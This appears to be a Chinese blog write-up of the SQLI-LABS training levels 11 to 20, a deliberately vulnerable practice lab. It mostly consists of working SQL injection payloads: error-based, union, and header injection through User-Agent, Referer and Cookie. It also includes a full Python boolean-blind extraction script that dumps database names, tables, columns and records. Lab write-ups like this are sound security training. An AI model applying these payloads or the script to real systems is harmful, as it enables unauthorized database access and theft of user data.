SQLI-LABS Page1 11-20
阿新 • • 發佈:2020-12-27
0x0B Less-11
報錯注入,只是注入方式為POST,可以直接使用報錯函式進行注入,也可以使用常規方法
- 報錯注入,之後更改注入語句即可
uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submit uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=123&submit=Submit uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=123&submit=Submit
- 常規注入
uname=admin' order by 2#&passwd=123&submit=Submit uname=' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=(database()))#&passwd=123&submit=Submit uname=' union select database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#&passwd=123&submit=Submit
0x0C Less-12
根據報錯資訊,得到分界符為")
,其餘操作如Less-11
0x0D Less-13
根據報錯判斷分界符')
,可以直接使用報錯注入,回顯無搜尋的列,可使用bool盲注
- bool盲注
import requests url = "http://192.168.44.214/sqli-labs/Less-13/" _columns = [] _tables = [] _database = "" resolver = "')" data = { "uname":"1", "passwd":"123", "submit":"Submit" } def binarySearch(payload): maxn = 144 minn = 1 while minn<=maxn: middle = (maxn+minn)//2 payload1 = payload+">"+str(middle)+"#" data['uname'] = payload1 #print(payload1) #exit(0) r = requests.post(url, data=data) # print(r.text) # exit(0) if "slap.jpg" in r.text: maxn = middle-1 else: minn = middle+1 return minn def getLength(func): payload1 = resolver+" or length({})".format(func) return binarySearch(payload1) def getStr(func, length): mstr = "" for i in range(1,length+1): payload = resolver+" or ascii(substr({},{},1))".format(func,i) tmp = binarySearch(payload) mstr += chr(tmp) #print(mstr) return mstr def getDatabase(): global _database func = "database()" result = getStr(func, getLength(func)) print("[*] database: "+result) _database = result def getTaleNUM(database): func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database) length = getLength(func) print(length) result = getStr(func, length) print("[*] table num ="+result) def getTales(database): global _tables func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database) length = getLength(func) result = getStr(func, length) _tables = result.split(',') print("[*] tables: "+result) def getColumns(table, database): global _columns func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database) length = getLength(func) #print(length) result = getStr(func, length) _columns = result.split(",") print("[*] columns from {}:".format(table)+result) def getInformation(table, column): Info = {} for i in column: func = "(select group_concat({}) from {})".format(i, table) length = getLength(func) #print(length) result = getStr(func, length) Info[i] = result.split(',') #print(result) #print(Info[i]) for i in range(len(Info[column[0]])): mstr = "" for j in column: mstr += Info[j][i] mstr += " " print(mstr) if __name__ == "__main__": getDatabase() getTales(_database) getColumns(_tables[0],_database) getInformation(_tables[0], _columns)
0x0E Less-14
根據報錯,判斷分界符為"
,指令碼和前一題一樣
0x0F Less-15
無報錯資訊,嘗試萬能密碼成功進入,可使用Less-13指令碼進行布林盲注,將分解符替換為'
0x10 Less-16
更改Less-13指令碼的分界符為")
0x11 Less-17
passwd能夠報錯,可以參照Less-11的報錯注入,當然,還有其他做法,還可以使用二次注入,利用欄位更新將sql語句的結果寫入欄位後,讀取獲得。
- 報錯注入
- 利用資料更新
當沒有報錯資訊時,可用嘗試插入一些sql語句,語句執行後,將所需要的資料儲存到欄位之中,通過檢視欄位得到資訊。
uname=admin&passwd=',password=database(),username='admin&submit=Submit
提交以上語句,將資料庫名儲存到admin的密碼中,再去能檢視密碼的關卡查詢:
的到相關資訊
完整查詢語句:
uname=admin&passwd=',password=database(),username='admin&submit=Submit
查詢表名:
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),1,10),username='admin&submit=Submit
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),11,25),username='admin&submit=Submit
查詢列名以及資訊,和之前關卡一樣,需要注意的是欄位能儲存的資料長度有限制,需要分多次查詢
0x12 Less-18
隨手登入一個賬號,發現顯示了UA的資訊,並嘗試更改UA,發現資訊改變,可能為UA注入
單引號UA報錯,可以使用報錯注入,注意原始碼中此處資料為插入資料,需要閉合括號。
payload:
1',1,updatexml(1,concat(0x7e,(database()),0x7e),1))#
0x13 Less-19
登入之後顯示reffer,輸入單引號,報錯,只是位置換了,其餘和Less-18一樣
0x14 Less-20
登入之後檢視cookie
嘗試單引號,報錯,嘗試報錯注入,成功拿取資料
聯合注入:
Cookie: uname=admin1' order by 4# 獲取列數
Cookie: uname=adm' union select 1,2,database()# 獲取資料庫
Cookie: uname=adm' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#